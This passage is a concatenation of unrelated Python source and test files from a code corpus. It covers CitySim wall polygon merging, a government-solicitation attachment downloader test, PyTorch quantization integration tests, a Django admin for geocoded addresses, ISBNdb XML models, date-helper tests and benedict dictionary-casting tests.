np.isclose(a[2], d[2]),
np.isclose(b[2], c[2]),
c[2] > d[2]))
for i in range(4): # make sure we don't loop forever on bad data!
if is_canonical(polygon):
return polygon
polygon = rotate(polygon)
assert False, 'polygon bad: %s' % polygon
def array_contains(array, item):
return any([is_same_vertex(item, x) for x in array])
def is_same_vertex(v0, v1):
return np.isclose(v0, v1).all()
def points_in_common(a, b):
'''
a: [array(x1, y1, z1), ... array(xn, yn, zn)]
b: [array(x1, y1, z1), ... array(xn, yn, zn)]
--> [array(xk, yk, zk), ... array(xl, yl, zl)]
with k and l being vertices in both polygons.
'''
result = []
for vertex in a:
if array_contains(b, vertex):
result.append(vertex)
return result
def get_number_of_vertices(obj):
'''
return the number of vertices - autocalculate,
since it is not always entered...
'''
return len(get_polygon(obj))
def collect_walls(citysim_xml):
'''return the Wall nodes objects
that are walls (vertical) and have 4 vertices
and rectangular'''
result = []
for wall in citysim_xml.findall('/District/Building/Zone/Wall'):
if get_number_of_vertices(wall) != 4:
# ignore this one
continue
polygon = get_polygon(wall)
try:
if not np.isclose(90.0, tilt(polygon)):
# ignore this one too
continue
except:
print 'bad polygon:', 'Wall@id=%s' % wall.get('id'), polygon
continue
vectors = [line[0] - line[1]
for line in zip(polygon, rotate(polygon))]
if not all([np.isclose(90.0, angle2vecs(v[0], v[1]))
for v in zip(vectors, rotate(vectors))]):
# not rectangular
continue
# meets criteria
result.append(wall)
return result
def get_polygon(wall):
'''
return a polygon representing the surface.
each vertices is an np.array.
'''
polygon = []
for v in wall.getchildren():
if v.tag.startswith('V'):
polygon.append(np.array((
float(v.get('x')),
float(v.get('y')),
float(v.get('z')))))
return polygon
def set_polygon(wall, polygon):
'''
set the vertices of a polygon.
'''
# delete old vertices
for vertex_xml in wall.getchildren():
if vertex_xml.tag.startswith('V'):
wall.remove(vertex_xml)
# add new vertices
for i, v in enumerate(polygon):
vertex_xml = etree.Element('V%i' % i)
vertex_xml.set('x', str(v[0]))
vertex_xml.set('y', str(v[1]))
vertex_xml.set('z', str(v[2]))
wall.append(vertex_xml)
def rotate(lst):
'''[a, b, c] --> [b, c, a]'''
result = lst[1:]
result.append(lst[0])
return result
def same_zone(wa, wb):
'''return True, if wa and wb are both children of the
same Building/Zone'''
return wa.getparent() == wb.getparent()
def same_construction(wa, wb):
'''return True, if wa and wb share construction information'''
return wa.get('type') == wb.get('type')
def merge_windows(wa, wb):
'''
update the attributes for the glazing / windows e.g.:
GlazingRatio="0.43"
GlazingGValue="0.7"
GlazingUValue="1.1"
ShortWaveReflectance="0.2"
Uvalue="0.5331238918939453"
using a weighted average for each value.
FIXME: is this physically correct?!
'''
aa = area(get_polygon(wa))
ab = area(get_polygon(wb))
attributes = ['GlazingRatio',
'GlazingGValue',
'GlazingUValue',
'ShortWaveReflectance',
'Uvalue']
for attrib in attributes:
wa.set(attrib, str(weighted_average(
get_float(wa, attrib),
get_float(wb, attrib),
aa, ab)))
def get_float(element, attribute):
return float(element.get(attribute, '0.0'))
def weighted_average(va, vb, aa, ab):
return (aa * va + ab * vb) / (aa + ab)
| 2.84375 | 3 |
loaders/attachments/test/test_opportunity_downloader.py | datumradix/fbointel | 57 | 12773202 | from contextlib import closing
from downloader import AttachmentDownloader
import unittest
import shelve
import os.path
class TestOpportunityDownloader(unittest.TestCase):
def setUp(self):
self.test_data = {
'FA4626-14-R-0011': [
{
'desc': 'Solicitation',
'filename': 'Solicitation.doc',
'url': 'https://www.fbo.gov/utils/view?id=46b7d20b80ba577b5e4dd10b1561b247'
},
{
'desc': 'Attch 1 Specifications',
'filename': 'Attch_1_Specifications.zip',
'url': 'https://www.fbo.gov/utils/view?id=f08375882eee4900f88a748fb8a941c7'
},
{
'desc': 'Attch 2 Material Submittal',
'filename': 'Attch_2_Submittal_Schedule.pdf',
'url': 'https://www.fbo.gov/utils/view?id=6b5544a2b5f254ae1dcfaea41f155960'
}
],
'FA-FOO-BAR-BAZ': [
{
'desc': 'Attch 3 Schedule of Drawings',
'filename': 'Attch_3_Schedule_of_Drawings.pdf',
'url': 'https://www.fbo.gov/utils/view?id=9e6640c9840978099dbe08351d0802bf'
},
{
'desc': 'Attch 4 Drawings',
'filename': 'Attch_4_Drawings.zip',
'url': 'https://www.fbo.gov/utils/view?id=58e041568e210a73884254db1c069855'
},
{
'desc': 'Attch 5 Wage Determination',
'filename': 'Attch_5_Wage_Determination.docx',
'url': 'https://www.fbo.gov/utils/view?id=7301f9274d34ebbf3ec3ff8df04968e4'
},
{
'desc': 'Attch 6 Base Entry Policy',
'filename': 'Attch_6_Base_Entry_Policy_Letter.pdf',
'url': 'https://www.fbo.gov/utils/view?id=b4e13ed9cdeb5eec3822465565810457'
}
]
}
with closing(shelve.open('test_attach')) as db:
for key in self.test_data:
db[key] = self.test_data[key]
def test_constructs_solnbr_download_directory_name(self):
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
self.assertEqual(downloader.dir_for_solnbr('FA-FOO-BAR-BAZ'), 'py_test_dls/FA-FOO-BAR-BAZ')
def test_creates_solnbr_download_directory(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
dirpath = downloader.dir_for_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
self.assertTrue(os.path.isdir(dirpath))
# clean up
os.rmdir(dirpath)
self.assertFalse(os.path.isdir(dirpath))
def test_downloader_does_not_care_if_directory_already_exists(self):
solnbr = 'FA-FOO-BAR-BAZ'
downloader = AttachmentDownloader(shelf='test_attach', dl_dir='py_test_dls')
downloader.create_dir_by_solnbr(solnbr)
downloader.create_dir_by_solnbr(solnbr)
# clean up
os.rmdir(downloader.dir_for_solnbr(solnbr))
if __name__ == '__main__':
unittest.main()
| 2.5 | 2 |
tools/pytorch-quantization/tests/integration_test.py | GreyZzzzzzXh/TensorRT | 0 | 12773203 | <filename>tools/pytorch-quantization/tests/integration_test.py<gh_stars>0
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""tests of integrating Quant layers into a network"""
import pytest
import numpy as np
import torch
import torch.nn.functional as F
import torch.optim as optim
from apex.amp import _amp_state
from pytorch_quantization import tensor_quant
from pytorch_quantization import quant_modules
from pytorch_quantization import nn as quant_nn
from pytorch_quantization.tensor_quant import QuantDescriptor
from tests.fixtures.models import LeNet, QuantLeNet
from tests.fixtures import verbose
np.random.seed(12345) # seed 1234 causes 1 number mismatch at 6th decimal in one of the tests
# make everything run on the GPU
torch.set_default_tensor_type('torch.cuda.FloatTensor')
# pylint:disable=missing-docstring, no-self-use
class TestNetwork():
"""test basic operations of quantized network"""
def test_simple_build(self):
"""test instantiation"""
quant_model = QuantLeNet(quant_desc_input=QuantDescriptor(), quant_desc_weight=QuantDescriptor())
for name, module in quant_model.named_modules():
if "quantizer" in name:
module.disable()
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
input_desc = QuantDescriptor(amax=6.)
weight_desc = QuantDescriptor(amax=1.)
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
def test_forward(self):
"""test forward pass with random data"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
output = quant_model(torch.empty(16, 1, 28, 28))
def test_backward(self):
"""test one iteration with random data and labels"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
quant_model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(quant_model.parameters(), lr=0.01)
optimizer.zero_grad()
output = quant_model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
def test_apex_amp_fp16(self):
"""test one iteration with random data and labels"""
try:
from apex import amp
except ImportError:
pytest.skip("AMP is not available.")
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(model.parameters(), lr=0.01)
model, optimizer = amp.initialize(model, optimizer, opt_level="O1")
optimizer.zero_grad()
output = model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
optimizer.step()
assert loss.dtype == torch.float32
_amp_state.handle._deactivate()
def test_native_amp_fp16(self):
"""test one iteration with random data and labels"""
input_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
weight_desc = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
model = QuantLeNet(quant_desc_input=input_desc, quant_desc_weight=weight_desc)
optimizer = optim.SGD(model.parameters(), lr=0.01)
optimizer.zero_grad()
with torch.cuda.amp.autocast():
output = model(torch.empty(16, 1, 28, 28))
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
assert loss.dtype == torch.float32
def test_asp(self):
"""test Sparsity (ASP) and QAT toolkits together"""
try:
from apex.contrib.sparsity import ASP
except ImportError:
pytest.skip("ASP is not available.")
quant_modules.initialize()
model = LeNet()
quant_modules.deactivate()
optimizer = optim.SGD(model.parameters(), lr=0.01)
ASP.init_model_for_pruning(
model,
mask_calculator="m4n2_1d",
verbosity=2,
whitelist=[torch.nn.Linear, torch.nn.Conv2d, torch.nn.Conv3d, quant_nn.modules.quant_linear.QuantLinear],
allow_recompute_mask=False,
custom_layer_dict={
quant_nn.QuantConv1d: ['weight'],
quant_nn.QuantConv2d: ['weight'],
quant_nn.QuantConv3d: ['weight'],
quant_nn.QuantConvTranspose1d: ['weight'],
quant_nn.QuantConvTranspose2d: ['weight'],
quant_nn.QuantConvTranspose3d: ['weight'],
quant_nn.QuantLinear: ['weight']
})
ASP.init_optimizer_for_pruning(optimizer)
ASP.compute_sparse_masks()
model = model.to('cuda')
output = model(torch.empty(16, 1, 28, 28).to('cuda'))
optimizer.zero_grad()
loss = F.nll_loss(output, torch.randint(10, (16,), dtype=torch.int64))
loss.backward()
optimizer.step()
def test_quant_module_replacement(self):
"""test monkey patching of modules with their quantized versions"""
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# Before any monkey patching, the networks should be different
assert(mod_list != qmod_list)
# Monkey patch the modules
no_replace_list = ["Linear"]
custom_quant_modules = [(torch.nn, "Linear", quant_nn.QuantLinear)]
quant_modules.initialize(no_replace_list, custom_quant_modules)
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# After monkey patching, the networks should be same
assert(mod_list == qmod_list)
# Reverse monkey patching
quant_modules.deactivate()
lenet = LeNet()
qlenet = QuantLeNet()
mod_list = [type(mod) for name, mod in lenet.named_modules()]
mod_list = mod_list[1:]
qmod_list = [type(mod) for name, mod in qlenet.named_modules()]
qmod_list = qmod_list[1:]
# After reversing monkey patching, the networks should again be different
assert(mod_list != qmod_list)
def test_calibration(self):
quant_model = QuantLeNet(quant_desc_input=QuantDescriptor(), quant_desc_weight=QuantDescriptor()).cuda()
for name, module in quant_model.named_modules():
if name.endswith("_quantizer"):
if module._calibrator is not None:
module.disable_quant()
module.enable_calib()
else:
module.disable()
print(F"{name:40}: {module}")
quant_model(torch.rand(16, 1, 224, 224, device="cuda"))
# Load calib result and disable calibration
for name, module in quant_model.named_modules():
if name.endswith("_quantizer"):
if module._calibrator is not None:
module.load_calib_amax()
module.enable_quant()
module.disable_calib()
else:
module.enable()
quant_model.cuda()
| 1.890625 | 2 |
src/generalStatistics/generalStatistics.py | nickeita/su2021_is601_project2 | 0 | 12773204 | from statsAuxiliary.statsAuxiliary import StatsAuxiliary
from generalStatistics.generalMedian import general_median
from generalStatistics.generalMode import general_mode
from generalStatistics.generalMean import general_mean
class GeneralStatistics(StatsAuxiliary):
result = 0
def __init__(self):
super().__init__()
pass
def g_mean(self, a):
self.result = general_mean(a)
return self.result
def g_median(self, a):
self.result = general_median(a)
return self.result
def g_mode(self, a):
self.result = general_mode(a)
return self.result
| 2.546875 | 3 |
easy_maps/admin.py | cyber-barrista/django-easy-maps | 114 | 12773205 | # -*- coding: utf-8 -*-
from django import forms
from django.contrib import admin
from django.utils.translation import gettext_lazy as _
from .models import Address
from .widgets import AddressWithMapWidget
class HasExceptionFilter(admin.SimpleListFilter):
title = _("exception")
parameter_name = "has_exception"
def lookups(self, request, model_admin):
return (
(1, _("Yes")),
(0, _("No")),
)
def queryset(self, request, queryset):
if self.value() is not None:
ids = Address.objects.values_list("pk", flat=True)
if self.value() == "1":
return queryset.filter(pk__in=ids)
elif self.value() == "0":
return queryset.exclude(pk__in=ids)
return queryset
class AddressAdmin(admin.ModelAdmin):
list_display = ["address", "computed_address", "latitude", "longitude", "has_exception"]
list_filter = [HasExceptionFilter]
search_fields = ["address"]
class form(forms.ModelForm):
class Meta:
widgets = {"address": AddressWithMapWidget({"class": "vTextField"})}
| 2.1875 | 2 |
isbndb/models.py | bbengfort/isbndb-python | 4 | 12773206 | <reponame>bbengfort/isbndb-python
class Model(object):
def __init__(self, xml):
self.raw_data = xml
def __str__(self):
return self.raw_data.toprettyxml( )
def _get_attribute(self, attr):
val = self.raw_data.getAttribute(attr)
if val == '':
return None
return val
def _get_element(self, name):
nodes = self.raw_data.getElementsByTagName(name)
if len(nodes) == 0:
return None
if len(nodes) > 1:
raise AttributeError("Too many elements with name %s" % name)
return nodes[0]
def _get_childNodes(self, name):
return self._get_element(name).childNodes if self._get_element(name) else []
def _get_nodeValue(self, node):
if isinstance(node, str):
nodes = self._get_childNodes(node)
elif hasattr(node, 'childNodes'):
nodes = node.childNodes
else:
return None
if len(nodes) == 0:
return None
if len(nodes) > 1:
raise AttributeError("Unable to parse value from node with name %s" % name)
return nodes[0].nodeValue
class Book(Model):
@property
def book_id(self):
return self._get_attribute('book_id')
@property
def isbn(self):
return self._get_attribute('isbn')
@property
def isbn13(self):
return self._get_attribute('isbn13')
@property
def title(self):
return self._get_nodeValue('Title')
@property
def title_long(self):
return self._get_nodeValue('TitleLong')
@property
def authors_text(self):
return self._get_nodeValue('AuthorsText')
@property
def authors(self):
for node in self._get_childNodes('Authors'):
if node.nodeType == node.ELEMENT_NODE:
aid = node.getAttribute('person_id')
name = self._get_nodeValue(node)
yield {
'person_id': aid,
'person_text': name,
}
@property
def publisher_id(self):
pelem = self._get_element('PublisherText')
if pelem is not None:
val = pelem.getAttribute('publisher_id')
if val != '':
return val
return None
@property
def publisher_text(self):
return self._get_nodeValue('PublisherText')
@property
def details(self):
delem = self._get_element('Details')
if delem is not None:
return dict(delem.attributes.items())
return None
@property
def summary(self):
return self._get_nodeValue('Summary')
@property
def notes(self):
return self._get_nodeValue('Notes')
@property
def urls_text(self):
return self._get_nodeValue('UrlsText')
@property
def awards_text(self):
return self._get_nodeValue('AwardsText')
@property
def prices(self):
for node in self._get_childNodes('Prices'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
@property
def subjects(self):
for node in self._get_childNodes('Subjects'):
if node.nodeType == node.ELEMENT_NODE:
sid = node.getAttribute('subject_id')
text = self._get_nodeValue(node)
yield {
'subject_id': sid,
'subject_text': text,
}
@property
def marc_records(self):
for node in self._get_childNodes('MARCRecords'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Subject(Model):
@property
def subject_id(self):
return self._get_attribute('subject_id')
@property
def book_count(self):
return self._get_attribute('book_count')
@property
def marc_field(self):
return self._get_attribute('marc_field')
@property
def marc_indicators(self):
return (self._get_attribute('marc_indicator_1'),
self._get_attribute('marc_indicator_2'))
@property
def name(self):
return self._get_nodeValue('Name')
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
@property
def structure(self):
for node in self._get_childNodes('SubjectStructure'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Category(Model):
@property
def category_id(self):
return self._get_attribute('category_id')
@property
def parent_id(self):
return self._get_attribute('parent_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return {}
@property
def subcategories(self):
for node in self._get_childNodes('SubCategories'):
if node.nodeType == node.ELEMENT_NODE:
yield dict(node.attributes.items())
class Author(Model):
@property
def author_id(self):
return self._get_attribute('person_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return None
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
@property
def subjects(self):
for node in self._get_childNodes('Subjects'):
if node.nodeType == node.ELEMENT_NODE:
sid = node.getAttribute('subject_id')
count = node.getAttribute('book_count')
text = self._get_nodeValue(node)
yield {
'subject_id': sid,
'book_count': count,
'subject_text': text,
}
class Publisher(Model):
@property
def publisher_id(self):
return self._get_attribute('publisher_id')
@property
def name(self):
return self._get_nodeValue('Name')
@property
def details(self):
delem = self._get_element('Details')
if delem:
return dict(delem.attributes.items())
return None
@property
def categories(self):
for node in self._get_childNodes('Categories'):
if node.nodeType == node.ELEMENT_NODE:
cid = node.getAttribute('category_id')
text = self._get_nodeValue(node)
yield {
'category_id': cid,
'category_text': text,
}
| 2.96875 | 3 |
test/test_helpers.py | caimmy/karuo | 0 | 12773207 | # _*_ coding: utf-8 _*_
"""
-------------------------------------------------
@File Name: test_helpers
@Description:
@Author: caimmy
@date: 2019/10/22 17:47
-------------------------------------------------
Change Activity:
-------------------------------------------------
"""
import unittest
from unittest import TestCase
import time, datetime
from karuo.helpers.logger_helper import LoggerTimedRotating
from karuo.helpers.date_helper import DatetimeHelper
from karuo.qywx.WXBizMsgCrypt import WXBizMsgCrypt
class HelperTest(TestCase):
def testTimedRotatingLogger(self):
l1 = LoggerTimedRotating.getInstance(r"./raws/t.log", logger="abc")
l1.debug("asdfasdf")
l2 = LoggerTimedRotating.getInstance(r"./raws/t.log", logger="adf")
l2.info("infor l2")
l3 = LoggerTimedRotating.getInstance(r"./raws/t1.log", logger="abc1")
l3.debug("debug l3")
def testDateBeforeNDays(self):
testDate = DatetimeHelper.date_before_n_days(3, datetime.datetime.strptime("2020-02-13 10:00:00", "%Y-%m-%d %H:%M:%S").timestamp())
self.assertEqual("2020-02-10", testDate.strftime("%Y-%m-%d"))
tStartDate = datetime.datetime.strptime("2020-02-13 10:00:00", "%Y-%m-%d %H:%M:%S")
t1, t2 = DatetimeHelper.day_range_of_timestamp(tStartDate, tStartDate)
self.assertEqual("2020-02-13 00:00:00", datetime.datetime.fromtimestamp(t1).strftime("%Y-%m-%d %H:%M:%S"))
self.assertEqual("2020-02-14 00:00:00", datetime.datetime.fromtimestamp(t2).strftime("%Y-%m-%d %H:%M:%S"))
def testDatelist(self):
ret_date_list = DatetimeHelper.date_list("2019-01-01", "2019-02-01")
self.assertEqual(len(ret_date_list), 31)
ret_date_list = DatetimeHelper.date_list("2019-01-01", "2019-02-01", True)
print(ret_date_list)
self.assertEqual(len(ret_date_list), 32)
def testWxencrypt(self):
sToken = "<KEY>"
sEncodingAESKey = "<KEY>"
sCorpID = "ww1436e0e65a779aee"
'''
------------使用示例一:验证回调URL---------------
*企业开启回调模式时,企业号会向验证url发送一个get请求
假设点击验证时,企业收到类似请求:
* GET /cgi-bin/wxpush?msg_signature=5c45ff5e21c57e6ad56bac8758b79b1d9ac89fd3×tamp=1409659589&nonce=263014780&echostr=P9nAzCzyDtyTWESHep1vC5X9xho%2FqYX3Zpb4yKa9SKld1DsH3Iyt3tP3zNdtp%2B4RPcs8TgAE7OaBO%2BFZXvnaqQ%3D%3D
* HTTP/1.1 Host: qy.weixin.qq.com
接收到该请求时,企业应 1.解析出Get请求的参数,包括消息体签名(msg_signature),时间戳(timestamp),随机数字串(nonce)以及企业微信推送过来的随机加密字符串(echostr),
这一步注意作URL解码。
2.验证消息体签名的正确性
3. 解密出echostr原文,将原文当作Get请求的response,返回给企业微信
第2,3步可以用企业微信提供的库函数VerifyURL来实现。
'''
wxcpt=WXBizMsgCrypt(sToken,sEncodingAESKey,sCorpID)
#sVerifyMsgSig=HttpUtils.ParseUrl("msg_signature")
#ret = wxcpt.VerifyAESKey()
#print ret
sVerifyMsgSig="012bc692d0a58dd4b10f8dfe5c4ac00ae211ebeb"
#sVerifyTimeStamp=HttpUtils.ParseUrl("timestamp")
sVerifyTimeStamp="1476416373"
#sVerifyNonce=HttpUitls.ParseUrl("nonce")
sVerifyNonce="47744683"
#sVerifyEchoStr=HttpUtils.ParseUrl("echostr")
sVerifyEchoStr="<KEY>
ret,sEchoStr=wxcpt.VerifyURL(sVerifyMsgSig, sVerifyTimeStamp,sVerifyNonce,sVerifyEchoStr)
if(ret!=0):
print("ERR: VerifyURL ret: " + str(ret))
if "__main__" == __name__:
suite = unittest.TestSuite()
suite.addTest(HelperTest("testWxencrypt"))
runner = unittest.TextTestRunner()
runner.run(suite) | 2.1875 | 2 |
contest/youtube/n.py | Akash671/Codechef | 2 | 12773208 |
# cook your dish here
a=int(input())
b=int(input())
while(1):
if a%b==0:
print(a)
break
else:
a-=1
| 3.5 | 4 |
operadores-relacionais.py | anderr8/Introducao_Linguagem_Python | 0 | 12773209 | """
Operadores relacionais
== Igual
!= Diferente
> Maior
< Menor
>= Maior ou igual
<= Menor ou igual
Operadores Lógicos
Operador Operação
AND → Duas condições sejam verdadeiras
OR → Pelo menos uma condição seja verdadeira
NOT → Inverte o valor
"""
"""
x = 2
y = 3
"""
"""
x = 3
y = 3
z = 3
"""
x = 3
y = 3
z = 4
#soma = x + y
print(x == y and x == z)
print(x == y or x == z and z == y) | 4.09375 | 4 |
scripts/beam_decode.py | quangvy2703/Up-Down-Captioner | 232 | 12773210 | #!/usr/bin/env python
"""
Decode a language model using one GPU.
"""
import numpy as np
import argparse
import sys
import json
import caffe
from evaluate import CaptionScorer
from util import restore_weights
def translate(vocab, blob):
caption = "";
w = 0;
while True:
next_word = vocab[int(blob[w])]
if w == 0:
next_word = next_word.title()
if w > 0 and next_word != "." and next_word != ",":
caption += " ";
if next_word == "\"" or next_word[0] == '"':
caption += "\\"; # Escape
caption += next_word;
w += 1
if caption[-1] == '.' or w == len(blob):
break
return caption
def beam_decode(
model, # net proto definition
vocab_file, # model vocab text file
weights, # pretrained weights to use
gpu, # device id
outfile, # json output
):
vocab = []
with open(vocab_file) as f:
for word in f:
vocab.append(word.strip())
print 'Loaded {:,} words into caption vocab'.format(len(vocab))
caffe.init_log(0, 1)
caffe.log('Using device %s' % str(gpu))
caffe.set_device(int(gpu))
caffe.set_mode_gpu()
net = caffe.Net(model, weights, caffe.TEST)
print 'Loaded proto {} with weights {}'.format(model,weights)
net.layers[0].load_dataset()
id_to_caption = {}
iteration = 0
while True:
ending = False
out = net.forward()
image_ids = net.blobs['image_id'].data
captions = net.blobs['caption'].data
scores = net.blobs['log_prob'].data
batch_size = image_ids.shape[0]
if captions.shape[0] == batch_size:
# Decoding a compact net
beam_size = captions.shape[2]
for n in range(batch_size):
if iteration == 0:
print "\nhttp://mscoco.org/explore/?id=%d" % image_ids[n][0]
for b in range(beam_size):
cap = translate(vocab, captions[n][0][b])
score = scores[n][0][b]
if iteration == 0:
print '[%d] %.2f %s' % (b,score,cap)
else:
# Decoding an unrolled net
beam_size = captions.shape[0] / batch_size
if iteration == 0:
print "Beam size: %d" % beam_size
for n in range(batch_size):
image_id = int(image_ids[n][0])
if iteration == 0:
print "\nhttp://mscoco.org/explore/?id=%d" % image_id
for b in range(beam_size):
cap = translate(vocab, captions[n*beam_size+b])
score = scores[n*beam_size+b]
if b == 0:
if image_id in id_to_caption:
ending = True
else:
id_to_caption[image_id] = cap
if iteration == 0:
print '[%d] %.2f %s' % (b,score,cap)
iteration += 1
if iteration % 1000 == 0:
print 'Iteration: %d' % iteration
if ending:
break
output = []
for image_id in sorted(id_to_caption.keys()):
output.append({
'image_id': image_id,
'caption': id_to_caption[image_id]
})
with open(outfile, 'w') as f:
json.dump(output,f)
print 'Generated %d outputs, saving to %s' % (len(output),outfile)
s = CaptionScorer()
s.score(outfile)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--model", required=True, help="Net proto definition.")
parser.add_argument("--weights", help="Pretrained weights.")
parser.add_argument("--gpu", type=int, default=0, help="Device id.")
parser.add_argument("--vocab", required=True, help="Vocab file.")
parser.add_argument("--outfile", required=True, help="Output file path.")
args = parser.parse_args()
restore_weights(args.weights)
beam_decode(args.model, args.vocab, args.weights, args.gpu, args.outfile)
| 2.5 | 2 |
django_decadence/urls.py | ksiazkowicz/django-decadence | 1 | 12773211 | <gh_stars>1-10
from django.conf.urls import url
from django_decadence.views import generate_html
urlpatterns = [
url(r'^template/$', generate_html, name='decadence_template'),
] | 1.445313 | 1 |
app.py | maikynata/bot-alerta-fogo | 1 | 12773212 | <reponame>maikynata/bot-alerta-fogo<filename>app.py
from flask import Flask
app = Flask(__name__, static_folder='static', static_url_path='')
@app.route("/")
def index():
# Render HTML with count variable
return app.send_static_file("index.html")
if __name__ == "__main__":
app.run() | 2.09375 | 2 |
rachis/urls.py | codeliezel/rachis | 0 | 12773213 | from django.urls import path, include
urlpatterns = [
path('api/', include(('rachis.apps.authentication.urls'), namespace='auth')),
path('api/', include(('rachis.apps.resource.urls'), namespace='resources')),
] | 1.546875 | 2 |
HelloWorld/Python01/_hello/math.py | grtlinux/KieaPython | 1 | 12773214 | # file: math.py
import math
print dir(math)
print math.pi
print math.e
print math.sin(1.0)
print math.sqrt(2)
| 1.945313 | 2 |
tests/dicts/test_benedict_casting.py | next-franciscoalgaba/python-benedict | 365 | 12773215 | # -*- coding: utf-8 -*-
from benedict import benedict
import unittest
class benedict_casting_test_case(unittest.TestCase):
def test__getitem__(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b['b.c']
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_cast_dict_to_benedict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bb = benedict(b)
bbd = bb.dict()
self.assertTrue(isinstance(bbd, dict))
self.assertFalse(isinstance(bbd, benedict))
self.assertEqual(d, bbd)
self.assertTrue(d is bbd)
def test_cast_benedict_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
# d1 = dict(**b)
# print(d1)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_cast_benedict_kwargs_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
d = dict(**b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bd = b.dict()
self.assertTrue(isinstance(bd, dict))
self.assertFalse(isinstance(bd, benedict))
self.assertTrue(d == bd)
self.assertTrue(d is bd)
def test_get(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get_dict('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_list_item(self):
d = {
'a': 1,
'b': {
'c': [
{ 'd': 2, },
{ 'e': 3, },
{ 'f': 4, },
]
},
}
b = benedict(d)
c = b.get_list_item('b.c', 1)
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'][1])
self.assertFalse(c is d['b']['c'][1])
def test_pop(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.pop('b.c')
